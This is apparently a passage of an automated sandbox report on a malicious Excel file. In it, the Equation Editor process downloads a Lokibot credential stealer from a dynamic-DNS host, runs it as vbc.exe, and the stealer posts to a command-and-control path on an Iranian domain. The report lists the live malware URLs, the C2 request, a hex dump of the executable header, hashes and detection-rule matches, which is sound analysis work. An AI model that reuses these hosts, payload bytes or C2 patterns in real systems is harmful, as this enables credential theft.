                Feb 16, 2021 07:02:46.157924891 CET192.168.2.228.8.8.80x3a6eStandard query (0)stdyrusschinetwomast.dns.armyA (IP address)IN (0x0001)
                Feb 16, 2021 07:02:50.794610023 CET192.168.2.228.8.8.80x23e5Standard query (0)becharnise.irA (IP address)IN (0x0001)

                DNS Answers

                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                Feb 16, 2021 07:02:44.512727976 CET8.8.8.8192.168.2.220xf63aNo error (0)cutt.ly172.67.8.238A (IP address)IN (0x0001)
                Feb 16, 2021 07:02:44.512727976 CET8.8.8.8192.168.2.220xf63aNo error (0)cutt.ly104.22.0.232A (IP address)IN (0x0001)
                Feb 16, 2021 07:02:44.512727976 CET8.8.8.8192.168.2.220xf63aNo error (0)cutt.ly104.22.1.232A (IP address)IN (0x0001)
                Feb 16, 2021 07:02:46.235662937 CET8.8.8.8192.168.2.220x3a6eNo error (0)stdyrusschinetwomast.dns.army103.141.138.123A (IP address)IN (0x0001)
                Feb 16, 2021 07:02:50.857706070 CET8.8.8.8192.168.2.220x23e5No error (0)becharnise.ir185.208.180.121A (IP address)IN (0x0001)

                HTTP Request Dependency Graph

                • stdyrusschinetwomast.dns.army
                • becharnise.ir

                HTTP Packets

                Session IDSource IPSource PortDestination IPDestination PortProcess
                0192.168.2.2249167103.141.138.12380C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                TimestampkBytes transferredDirectionData
                Feb 16, 2021 07:02:46.460187912 CET73OUTGET /receiprt/regasm.exe HTTP/1.1
                Accept: */*
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Connection: Keep-Alive
                Host: stdyrusschinetwomast.dns.army
                Feb 16, 2021 07:02:46.682566881 CET75INHTTP/1.1 200 OK
                Date: Tue, 16 Feb 2021 06:02:42 GMT
                Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38
                Last-Modified: Tue, 16 Feb 2021 01:44:33 GMT
                ETag: "41c00-5bb6a3e863566"
                Accept-Ranges: bytes
                Content-Length: 269312
                Keep-Alive: timeout=5, max=100
                Connection: Keep-Alive
                Content-Type: application/x-msdownload
                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e0 7b ab 66 a4 1a c5 35 a4 1a c5 35 a4 1a c5 35 ba 48 50 35 b6 1a c5 35 ba 48 41 35 99 1a c5 35 ba 48 46 35 d7 1a c5 35 83 dc be 35 a1 1a c5 35 a4 1a c4 35 d4 1a c5 35 ba 48 4f 35 a5 1a c5 35 ba 48 57 35 a5 1a c5 35 ba 48 51 35 a5 1a c5 35 ba 48 54 35 a5 1a c5 35 52 69 63 68 a4 1a c5 35 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 e4 41 b2 5d 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 f0 02 00 00 b2 c6 04 00 00 00 00 40 30 00 00 00 10 00 00 00 00 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 90 c8 04 00 04 00 00 6d 30 04 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 20 86 03 00 62 00 00 00 60 7d 03 00 3c 00 00 00 00 10 c8 04 18 76 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 84 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 71 ee 02 00 00 10 00 00 00 f0 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 86 00 00 00 00 03 00 00 88 00 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a8 74 c4 04 00 90 03 00 00 28 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 18 76 00 00 00 10 c8 04 00 78 00 00 00 a4 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Data Ascii: MZ@!L!This program cannot be run in DOS mode.${f555HP55HA55HF555555HO55HW55HQ55HT55Rich5PELA]@0@m0 b`}<v.textq `.rdata@@.datat(|@.rsrcvx@@


                Session IDSource IPSource PortDestination IPDestination PortProcess
                1192.168.2.2249168185.208.180.12180C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData
                Feb 16, 2021 07:02:51.005729914 CET359OUTPOST /fa13/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: becharnise.ir
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 4081BD40
                Content-Length: 176
                Connection: close


                HTTPS Packets

                TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                Feb 16, 2021 07:02:44.655622959 CET172.67.8.238443192.168.2.2249165CN=www.cutt.ly CN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=USCN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=USSat Feb 08 01:00:00 CET 2020 Thu Nov 02 13:24:33 CET 2017Thu Apr 08 14:00:00 CEST 2021 Tue Nov 02 13:24:33 CET 2027771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                CN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=USThu Nov 02 13:24:33 CET 2017Tue Nov 02 13:24:33 CET 2027

                Code Manipulations

                Statistics

                Behavior

                Click to jump to process

                System Behavior

                Analysis Process: EXCEL.EXE PID: 944 Parent PID: 584

                General

                Start time:07:01:50
                Start date:16/02/2021
                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                Wow64 process (32bit):false
                Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                Imagebase:0x13f0d0000
                File size:27641504 bytes
                MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Analysis Process: EQNEDT32.EXE PID: 2344 Parent PID: 584

                General

                Start time:07:02:10
                Start date:16/02/2021
                Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                Wow64 process (32bit):true
                Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                Imagebase:0x400000
                File size:543304 bytes
                MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Analysis Process: vbc.exe PID: 1276 Parent PID: 2344

                General

                Start time:07:02:14
                Start date:16/02/2021
                Path:C:\Users\Public\vbc.exe
                Wow64 process (32bit):true
                Commandline:'C:\Users\Public\vbc.exe'
                Imagebase:0x400000
                File size:269312 bytes
                MD5 hash:2559B5B8D60DD663DF52D0570F5973A9
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2374661998.0000000000220000.00000040.00000001.sdmp, Author: Joe Security
                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000004.00000002.2374661998.0000000000220000.00000040.00000001.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000004.00000002.2374661998.0000000000220000.00000040.00000001.sdmp, Author: Joe Security
                • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000004.00000002.2374661998.0000000000220000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000004.00000003.2160266537.0000000000240000.00000004.00000001.sdmp, Author: Florian Roth
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.2160266537.0000000000240000.00000004.00000001.sdmp, Author: Joe Security
                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000004.00000003.2160266537.0000000000240000.00000004.00000001.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000004.00000003.2160266537.0000000000240000.00000004.00000001.sdmp, Author: Joe Security
                • Rule: Loki_1, Description: Loki Payload, Source: 00000004.00000003.2160266537.0000000000240000.00000004.00000001.sdmp, Author: kevoreilly
                • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000004.00000003.2160266537.0000000000240000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                • Rule: Loki_1, Description: Loki Payload, Source: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, Author: kevoreilly
                • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                Antivirus matches:
                • Detection: 100%, Joe Sandbox ML
                • Detection: 36%, ReversingLabs
                Reputation:low

                Disassembly

                Code Analysis

                Reset < >